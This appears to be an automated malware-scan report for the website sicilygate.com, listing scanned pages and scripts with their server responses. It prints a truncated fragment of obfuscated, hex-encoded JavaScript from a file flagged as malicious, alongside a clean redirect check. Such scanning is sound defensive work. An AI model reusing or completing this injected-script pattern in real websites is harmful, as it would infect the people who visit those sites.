Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sicilygate.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sicilygate.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 Jan 2015 01:08:26 GMT Location: http://www.sicilygate.com/ Server: Apache Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sicilygate.com/ | 200 OK Content-Length: 19794 Content-Type: text/html | clean |
http://www.sicilygate.com/js/jquery.tools.min.js | 200 OK Content-Length: 139262 Content-Type: application/javascript | clean |
http://sicilygate.com/js/jquery_002.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 Jan 2015 01:08:28 GMT Location: http://www.sicilygate.com/js/jquery_002.js Server: Apache Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sicilygate.com/js/jquery_002.js | 200 OK Content-Length: 46529 Content-Type: application/javascript | clean |
http://sicilygate.com/js/gour.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 Jan 2015 01:08:29 GMT Location: http://www.sicilygate.com/js/gour.js Server: Apache Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sicilygate.com/js/gour.js | 200 OK Content-Length: 1304 Content-Type: application/javascript | clean |
http://sicilygate.com/js/aj_send_get.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 Jan 2015 01:08:29 GMT Location: http://www.sicilygate.com/js/aj_send_get.js Server: Apache Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sicilygate.com/js/aj_send_get.js | 200 OK Content-Length: 7541 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xbcf8=["\x26\x74\x53\x3D","\x67\x65\x74\x54\x69\x6D\x65","\x67\x65\x74","\x6F\x70\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x74\x65\x78\x74\x2F\x70\x6C\x61\x69\x6E\x3B\x20\x63\x68\x61\x72\x73\x65\x74\x3D\x49\x53\x4F\x2D\x38\x38\x35\x39\x2D\x31","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x43\x61\x63\x68\x65\x2D\x43\x6F\x6E\x74\x72\x6F\x6C","\x6E\x6F\x2D\x63\x61\x63\x68\x65","\x50\x72\x61\x67\x6D\x61","\x Antivirus reports:
| ||
http://sicilygate.com/js/utility.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 Jan 2015 01:08:30 GMT Location: http://www.sicilygate.com/js/utility.js Server: Apache Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sicilygate.com/js/utility.js | 200 OK Content-Length: 2934 Content-Type: application/javascript | clean |
http://sicilygate.com/js/utility_testo.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 Jan 2015 01:08:30 GMT Location: http://www.sicilygate.com/js/utility_testo.js Server: Apache Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sicilygate.com/js/utility_testo.js | 200 OK Content-Length: 3348 Content-Type: application/javascript | clean |
http://sicilygate.com/js/previewimg.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 Jan 2015 01:08:31 GMT Location: http://www.sicilygate.com/js/previewimg.js Server: Apache Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sicilygate.com/js/previewimg.js | 200 OK Content-Length: 2345 Content-Type: application/javascript | clean |
http://sicilygate.com/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 Jan 2015 01:08:31 GMT Location: http://www.sicilygate.com/index.php Server: Apache Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sicilygate.com/index.php | 200 OK Content-Length: 19794 Content-Type: text/html | clean |
http://www.sicilygate.com/lista-delle-imbarcazioni.php?tp=all | 200 OK Content-Length: 22726 Content-Type: text/html | clean |
http://www.sicilygate.com/js/jquery.tablesorter.min.js | 200 OK Content-Length: 16520 Content-Type: application/javascript | clean |
http://www.sicilygate.com/js/viewpreviewimg.js | 200 OK Content-Length: 2347 Content-Type: application/javascript | clean |
http://www.sicilygate.com/barche/yacht-two-life-trapani.php | 200 OK Content-Length: 24028 Content-Type: text/html | clean |
http://www.sicilygate.com/barche/../js/utility_testo.js | 200 OK Content-Length: 3348 Content-Type: application/javascript | clean |
http://www.sicilygate.com/barche/../js/jquery.tools.min.js | 200 OK Content-Length: 139262 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sicilygate.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 28 Jan 2015 01:08:26 GMT
Location: http://www.sicilygate.com/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
GET / HTTP/1.1
Host: sicilygate.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 28 Jan 2015 01:08:26 GMT
Location: http://www.sicilygate.com/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sicilygate.com
Referer: http://www.google.com/search?q=sicilygate.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sicilygate.com
Referer: http://www.google.com/search?q=sicilygate.com
Result:
The result is similar to the first query. There are no suspicious redirects found.